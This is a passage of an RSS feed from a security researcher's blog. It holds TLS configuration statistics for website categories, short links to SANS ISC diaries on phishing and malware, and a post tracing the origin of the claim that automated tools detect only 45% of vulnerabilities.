    &lt;col width=&#34;150&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;tr&gt;
        &lt;td&gt;&lt;b&gt;Category&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;SWEET32&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;RC4&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;POODLE&lt;/b&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Society&lt;/td&gt;
        &lt;td&gt;27.08&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;2.08&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Adult&lt;/td&gt;
        &lt;td&gt;36.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;2.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr style=&#34;color: darkgrey;&#34;&gt;
        &lt;td&gt;Internet Banking&lt;/td&gt;
        &lt;td&gt;30.55&lt;/td&gt;
        &lt;td&gt;0.51&lt;/td&gt;
        &lt;td&gt;0.07&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Science&lt;/td&gt;
        &lt;td&gt;20.41&lt;/td&gt;
        &lt;td&gt;2.04&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Computers&lt;/td&gt;
        &lt;td&gt;48.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Sports&lt;/td&gt;
        &lt;td&gt;37.50&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Arts&lt;/td&gt;
        &lt;td&gt;36.73&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Games&lt;/td&gt;
        &lt;td&gt;34.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;News&lt;/td&gt;
        &lt;td&gt;34.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Home&lt;/td&gt;
        &lt;td&gt;32.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Recreation&lt;/td&gt;
        &lt;td&gt;30.61&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Shopping&lt;/td&gt;
        &lt;td&gt;26.53&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Regional&lt;/td&gt;
        &lt;td&gt;26.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Health&lt;/td&gt;
        &lt;td&gt;24.49&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Kids and Teens&lt;/td&gt;
        &lt;td&gt;24.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Reference&lt;/td&gt;
        &lt;td&gt;24.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Business&lt;/td&gt;
        &lt;td&gt;20.41&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;p&gt;The last thing, which should be mentioned is that on average only 23.54% of the sites from the Alexa&amp;rsquo;s categories were configured in accordance with the current security best practices (i.e. they only supported TLSv1.2 and possibly TLSv1.3). Percentages for all of the categories tested may be found in the following chart.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://untrustednetwork.net/images/2020/01-tls-ssl-alexa/tlsv12_only.png&#34;&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/01-tls-ssl-alexa/tlsv12_only.png&#34; alt=&#34;Percentage of sites configured in accordance with current security best practices&#34; style=&#34;width:600px;&#34;&gt;&lt;/a&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/stats.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Bank</category>
            
          
            
              <category>Alexa</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Internet banking sites and their use of TLS... and SSLv3... and SSLv2?!</title>
        <link>https://untrustednetwork.net/en/2019/12/13/sans-isc-diary-internet-banking-sites-and-their-use-of-tls...-and-sslv3...-and-sslv2/</link>
        <pubDate>Fri, 13 Dec 2019 08:22:37 +0100</pubDate>
        
        <atom:modified>Fri, 13 Dec 2019 08:22:37 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/12/13/sans-isc-diary-internet-banking-sites-and-their-use-of-tls...-and-sslv3...-and-sslv2/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at the use of TLS (and SSL) on banking sites all over the world.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Internet+banking+sites+and+their+use+of+TLS+and+SSLv3+and+SSLv2/25606/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at the use of TLS (and SSL) on banking sites all over the world.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Bank</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing with a self-contained credential-stealing webpage</title>
        <link>https://untrustednetwork.net/en/2019/12/06/sans-isc-diary-phishing-with-a-self-contained-credential-stealing-webpage/</link>
        <pubDate>Fri, 06 Dec 2019 07:30:00 +0100</pubDate>
        
        <atom:modified>Fri, 06 Dec 2019 07:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/12/06/sans-isc-diary-phishing-with-a-self-contained-credential-stealing-webpage/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at an interesting phishing message, which carried a complete phishing web page as its attachment.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at an interesting phishing message, which carried a complete phishing web page as its attachment.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - E-mail from Agent Tesla</title>
        <link>https://untrustednetwork.net/en/2019/12/05/sans-isc-diary-e-mail-from-agent-tesla/</link>
        <pubDate>Thu, 05 Dec 2019 07:30:00 +0100</pubDate>
        
        <atom:modified>Thu, 05 Dec 2019 07:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/12/05/sans-isc-diary-e-mail-from-agent-tesla/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at a multi-stage downloader for Agent Tesla.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Email+from+Agent+Tesla/25576/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at a multi-stage downloader for Agent Tesla.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Malware Analysis</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Analysis of a strangely poetic malware</title>
        <link>https://untrustednetwork.net/en/2019/12/04/sans-isc-diary-analysis-of-a-strangely-poetic-malware/</link>
        <pubDate>Wed, 04 Dec 2019 08:14:33 +0100</pubDate>
        
        <atom:modified>Wed, 04 Dec 2019 08:14:33 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/12/04/sans-isc-diary-analysis-of-a-strangely-poetic-malware/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at a macro-based dropper sent to the Internet Storm Center by one of our readers.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Analysis+of+a+strangely+poetic+malware/25572/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at a macro-based dropper sent to the Internet Storm Center by one of our readers.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Malware Analysis</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Lessons learned from playing a willing phish</title>
        <link>https://untrustednetwork.net/en/2019/11/26/sans-isc-diary-lessons-learned-from-playing-a-willing-phish/</link>
        <pubDate>Tue, 26 Nov 2019 12:08:19 +0100</pubDate>
        
        <atom:modified>Tue, 26 Nov 2019 12:08:19 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/11/26/sans-isc-diary-lessons-learned-from-playing-a-willing-phish/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at baiting phishing attackers and at some of the lessons we may learn from it.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Lessons+learned+from+playing+a+willing+phish/25552/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at baiting phishing attackers and at some of the lessons we may learn from it.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Did the recent malicious BlueKeep campaign have any positive impact when it comes to patching?</title>
        <link>https://untrustednetwork.net/en/2019/11/10/sans-isc-diary-did-the-recent-malicious-bluekeep-campaign-have-any-positive-impact-when-it-comes-to-patching/</link>
        <pubDate>Sun, 10 Nov 2019 11:55:40 +0100</pubDate>
        
        <atom:modified>Sun, 10 Nov 2019 11:55:40 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/11/10/sans-isc-diary-did-the-recent-malicious-bluekeep-campaign-have-any-positive-impact-when-it-comes-to-patching/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. If you wondered whether the recent &amp;ldquo;BlueKeep worm scare&amp;rdquo; had any impact when it comes to the number of vulnerable systems out there, then this one is for you.
EDIT 13/11/2019: Shaun from The Register liked the post and wrote an article based on it - you may find it here.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Did+the+recent+malicious+BlueKeep+campaign+have+any+positive+impact+when+it+comes+to+patching/25506/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. If you wondered whether the recent &amp;ldquo;BlueKeep worm scare&amp;rdquo; had any impact when it comes to the number of vulnerable systems out there, then this one is for you.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;EDIT 13/11/2019: Shaun from The Register liked the post and wrote an article based on it - you may find it &lt;a href=&#34;https://www.theregister.co.uk/2019/11/11/bluekeep_didnt_boost_patching/&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>BlueKeep</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - EML attachments in O365 - a recipe for phishing</title>
        <link>https://untrustednetwork.net/en/2019/10/31/sans-isc-diary-eml-attachments-in-o365-a-recipe-for-phishing/</link>
        <pubDate>Thu, 31 Oct 2019 11:15:35 +0100</pubDate>
        
        <atom:modified>Thu, 31 Oct 2019 11:15:35 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/10/31/sans-isc-diary-eml-attachments-in-o365-a-recipe-for-phishing/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at the absence of filtering of EML attachments in O365 and what it can lead to.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/EML+attachments+in+O365+a+recipe+for+phishing/25474/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at the absence of filtering of EML attachments in O365 and what it can lead to.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>O365</category>
            
          
            
              <category>EML</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Do automated tools really detect only 45% of all vulnerabilities?</title>
        <link>https://untrustednetwork.net/en/2019/10/19/do-automated-tools-really-detect-only-45-of-all-vulnerabilities/</link>
        <pubDate>Sat, 19 Oct 2019 18:50:15 +0200</pubDate>
        
        <atom:modified>Sat, 19 Oct 2019 18:50:15 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/10/19/do-automated-tools-really-detect-only-45-of-all-vulnerabilities/</guid>
        <description>If you&amp;rsquo;ve dealt with IT security for any length of time, chances are that you&amp;rsquo;ve come across a claim that research has shown that automated tools can only detect 45% of vulnerabilities. It is often cited to illustrate the need for participation of human experts in security and penetration tests. However is the claim really true?
You may find it in, among many other places, the latest OWASP Testing Guide.</description>
        <content:encoded>&lt;p&gt;If you&amp;rsquo;ve dealt with IT security for any length of time, chances are that you&amp;rsquo;ve come across a claim that &lt;em&gt;research has shown that automated tools can only detect 45% of vulnerabilities&lt;/em&gt;. It is often cited to illustrate the need for participation of human experts in security and penetration tests. However is the claim really true?&lt;/p&gt;
&lt;p&gt;You may find it in, among many other places, the latest &lt;a href=&#34;https://www.owasp.org/images/1/19/OTGv4.pdf&#34;&gt;OWASP Testing Guide&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2019/cwe/otg.png&#34; alt=&#34;OTGv4&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.owasp.org/images/1/19/OTGv4.pdf&#34;&gt;OWASP Testing Guide v4, page 22&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;/p&gt;
&lt;p&gt;Given this source in particular, one might reasonably expect the claim to be correct&amp;hellip;but, as you may have guessed, that is not the case. Or rather not entirely. Some other sources cite the original research, where the number 45% originated, more or less correctly, as &lt;em&gt;tools are capable of detecting 45% of &lt;strong&gt;types&lt;/strong&gt; of vulnerabilities&lt;/em&gt;. This version may be found (again, among many other places) in several OWASP presentations.&lt;/p&gt;
&lt;p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2019/cwe/owasp-presentation.png&#34; alt=&#34;OWASP-Embed within SDLC-slide 42&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.owasp.org/images/f/f2/Education_Module_Embed_within_SDLC.ppt&#34;&gt;OWASP - Embed within SDLC, slide 42&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;/p&gt;
&lt;p&gt;Many have cited these presentations. For example Mitnick Security, company of the world renowned Kevin Mitnick, cites OWASP almost word for word on their website. However, as a closer look at the text of their site shows, even they, when coming from exact citation of OWASP, managed to interpret the conclusions of the original research to mean &amp;ldquo;automated tools detect only 45% of vulnerabilities&amp;rdquo; in some cases.&lt;/p&gt;
&lt;p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2019/cwe/mitnick1.png&#34; alt=&#34;Citation of OWASP on mitnicksecurity.com&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.mitnicksecurity.com/security/information/vulnerability-assessments-threat-and-risk-analysis&#34;&gt;mitnicksecurity.com&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;/p&gt;
&lt;p&gt;Leaving misunderstanding/misquoting of the original conclusions to one side, even in cases when the conclusions are cited correctly, many seem to gloss over the fact that the research, which resulted in the &amp;ldquo;45%&amp;rdquo; result, was limited in scope to only certain types of tools and took place all the way back in 2007 so its results don&amp;rsquo;t necessarily describe the current state of affairs&amp;hellip; But we&amp;rsquo;re getting ahead of ourselves. First, let&amp;rsquo;s take a look at where the number actually came from.&lt;/p&gt;
&lt;p&gt;OWASP Testing Guide is one of the few places where we may find an attribution (although the reference in OTG should point to [21], not [22]), which leads us to a presentation from BlackHat DC 2007 by a team (Robert A. Martin, Sean Barnum and Steve Christey) from MITRE/Cigital.&lt;/p&gt;
&lt;p&gt;Unfortunately, by itself, the slide from the presentation which is cited in OTG doesn&amp;rsquo;t give us much information. We may deduce from it that 55% of CWEs were found not to be covered by - presumably - some tested or analyzed tools, but that is about it.&lt;/p&gt;
&lt;p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2019/cwe/slide_30.png&#34; alt=&#34;Slide 30&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&#34;&gt;MITRE, Being Explicit About Weaknesses, Slide 30, Coverage of CWE&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;/p&gt;
&lt;p&gt;Since the other slides in the presentation don&amp;rsquo;t give us any more information regarding the presumed 45% detection rate, we need to dig a bit deeper. After a while of Googling, one might find couple of articles from the same authors on MITRE website (&lt;a href=&#34;https://cwe.mitre.org/documents/being-explicit/BlackHat_BeingExplicit_WP.pdf&#34;&gt;one which probably served as a basis for the BlackHat talk&lt;/a&gt; and &lt;a href=&#34;https://cwe.mitre.org/documents/xtalkmartin.pdf&#34;&gt;one from CrossTalk magazine&lt;/a&gt;), which are both titled the same as the presentation. Neither of them, unfortunately, sheds any light on the issue of detection rate among automated tools.&lt;/p&gt;
&lt;p&gt;I have to admit that this was the point, where my Google-Fu failed me as I was unable to find anything more exact with regards to the original research. I was, however, able to find e-mail contacts for all three authors of the original paper/presentation from BlackHat DC 2007 and one of them - Bob Martin - was kind enough to reply to my message and explain what their work was based on. Following paragraphs are contents of the e-mail I received, unedited except for the use of bold font for what I believe are the most important parts.&lt;/p&gt;
&lt;br&gt;
&lt;hr /&gt;
&lt;div&gt;
&lt;i&gt;
&lt;b&gt;The source of that statistic is the MITRE CWE Team&#39;s compilation of the knowledge-bases from the static analysis tools that provided us with the details of weaknesses so we could build out CWE.
&lt;br&gt;
&lt;br&gt;While we don&#39;t have a specific list of those who donated content, the list of organization on the CWE Community page is close, if you limit yourself to tool and researcher organizations.
&lt;br&gt;
&lt;br&gt;The 2007 Black Hat talk does a pretty good job covering what went into the creation of CWE.
&lt;br&gt;
&lt;br&gt;So when we combined all of these different knowledge-sources we found that there was only a very slight intersections between the tools knowledge-bases.
&lt;br&gt;
&lt;br&gt;Now a days, the best way to recreate this would be to use the COVERAGE CLAIMS that most of the CWE Compatible tools and services provide.&lt;/b&gt;
&lt;br&gt;
&lt;br&gt;Examples of Publicly Available CWE Coverage Claims:
&lt;br&gt;----------------------------------------------------------------------
&lt;br&gt;https://www.synopsys.com/content/dam/synopsys/sig-assets/datasheets/coverity-cwe-sanstop25.pdf
&lt;br&gt;https://www.grammatech.com/software-assurance/certifications-compliance/cwe
&lt;br&gt;https://docs.sonarqube.org/latest/user-guide/security-rules/
&lt;br&gt;https://help.veracode.com/reader/DGHxSJy3Gn3gtuSIN2jkRQ/o5xpvFVymSUGcFJ492HXEg
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/CWE_IDs_mapped_to_Klocwork_C_and_C%2B%2B_checkers
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/2011_CWE-SANS_Top_25_Most_Dangerous_Software_Errors_mapped_to_Klocwork_checkers
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/2010_CWE-SANS_Top_25_Most_Dangerous_Software_Errors_mapped_to_Klocwork_checkers
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/CWE_IDs_mapped_to_Klocwork_Java_checkers
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/2011_CWE-SANS_Top_25_Most_Dangerous_Software_Errors_mapped_to_Klocwork_checkers
&lt;br&gt;http://docs.klocwork.com/Insight-10.0/2010_CWE-SANS_Top_25_Most_Dangerous_Software_Errors_mapped_to_Klocwork_checkers
&lt;br&gt;https://access.redhat.com/articles/171613
&lt;br&gt;https://dwheeler.com/flawfinder/flawfinder.pdf
&lt;br&gt;https://vulncat.fortify.com/en/weakness
&lt;br&gt;
&lt;br&gt;On the last one, we&#39;d like to get Fortify to offer their coverage indexed by CWE Ids but so far this is what we have from them.
&lt;br&gt;
&lt;br&gt;&lt;b&gt;That being said, the statistic we did in 2007 was only for static analysis tools, since at that time they were the only one really documenting the flaws they found and talking about how to fix them.&lt;/b&gt;
&lt;br&gt;
&lt;br&gt;Similar static analysis studies were done by the Center for Assured Software (CAS) out of NSA.  Here&#39;s links to their 2010 and 2011 reports:
&lt;br&gt;
&lt;br&gt;http://cps-vo.org/file/1152/download/30152
&lt;br&gt;https://samate.nist.gov/docs/CAS_2011_SA_Tool_Method.pdf
&lt;br&gt;
&lt;br&gt;On slides 21 &amp; 22 of the first one, and on page 25 of the second one they show the overlap in findings between tools.
&lt;br&gt;
&lt;br&gt;&lt;b&gt;Today you&#39;d want to include DAST and Binary analysis, along with any other tool/technique that can uncover weaknesses in software architecture, software design, software code, and the deployment of software into operations.
&lt;br&gt;
&lt;br&gt;You would also want include more of the quality issues that only indirectly make it easier to introduce a vulnerability and/or make the vulnerability more difficult to detect or mitigate, like reliability, performance, and maintainability, similar to the expansion undergone by CWE itself in January https://cwe.mitre.org/news/index.html#jan032019_CWE_Version_3.2_Now_Available.&lt;/b&gt;
&lt;br&gt;
&lt;br&gt;Within CWE these are captured in the CWE-1128 view (CISQ Quality Measures (2016)) and the &#34;quality&#34; slice (CWE-1040, Quality Weaknesses with Indirect Security Impacts), which includes not-automatically-detectable quality issues.
&lt;br&gt;
&lt;br&gt;CISQ recently published an update to their work which we are still capturing as a CWE view.
&lt;br&gt;
&lt;br&gt;Leveraging the CAS work, NIST has been holding Software Assurance Tool Evaluation (SATE) efforts, where NIST is working with the community, both private industry, academia, and government, to get a better handle on what weaknesses tools find and how well they find them. They have annual workshops and share test programs (Juliet).
&lt;br&gt;
&lt;br&gt;Finally, tools can not find many architecture or design weakness https://cwe.mitre.org/data/definitions/1008.html.  If the development effort using model-based software engineering tools they theoretically can find some of these - which is the focus of a new MBSE Working Group in the Consortium of Information and Security Quality (CISQ).
&lt;br&gt;
&lt;/i&gt;
&lt;/div&gt;
___
&lt;br&gt;
&lt;p&gt;As we may see - among many other information for which I&amp;rsquo;m very grateful to Bob Martin - the original research only covered static analysis tools (SAST). Even if the research wasn&amp;rsquo;t as old as it is, this fact alone shows its results should not be interpreted and presented in the way they very often are.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t get me wrong - I don&amp;rsquo;t claim that tools alone can find every type of vulnerability out there. They can&amp;rsquo;t - automated scanners and other tools are great at finding certain types of vulnerabilities, but for others, they are either unable to find them at all or don&amp;rsquo;t come even close to what an experienced penetration tester, analyst or auditor may discover. I don&amp;rsquo;t even claim that tools are currently capable of finding more than 45% of all vulnerability types - I don&amp;rsquo;t know whether or not they are and as far as I can tell, no one else does either.&lt;/p&gt;
&lt;p&gt;And that is the point - although we might like to have hard numbers to back up why human factor is indispensable when it comes to finding vulnerabilities, citing results of a study from 2007 as current, or using misquoted version of its conclusions in marketing materials in order to convince customers that they &lt;strong&gt;really&lt;/strong&gt; need &lt;strong&gt;our&lt;/strong&gt; experienced pentesters in order to be secure, is something we should try very hard to avoid.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>CWE</category>
            
          
        
        
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing e-mail spoofing SPF-enabled domain</title>
        <link>https://untrustednetwork.net/en/2019/10/17/sans-isc-diary-phishing-e-mail-spoofing-spf-enabled-domain/</link>
        <pubDate>Thu, 17 Oct 2019 11:49:25 +0200</pubDate>
        
        <atom:modified>Thu, 17 Oct 2019 11:49:25 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/10/17/sans-isc-diary-phishing-e-mail-spoofing-spf-enabled-domain/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at SPF and when even SPF-enabled domains may be spoofed.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at SPF and when even SPF-enabled domains may be spoofed.&lt;/p&gt;
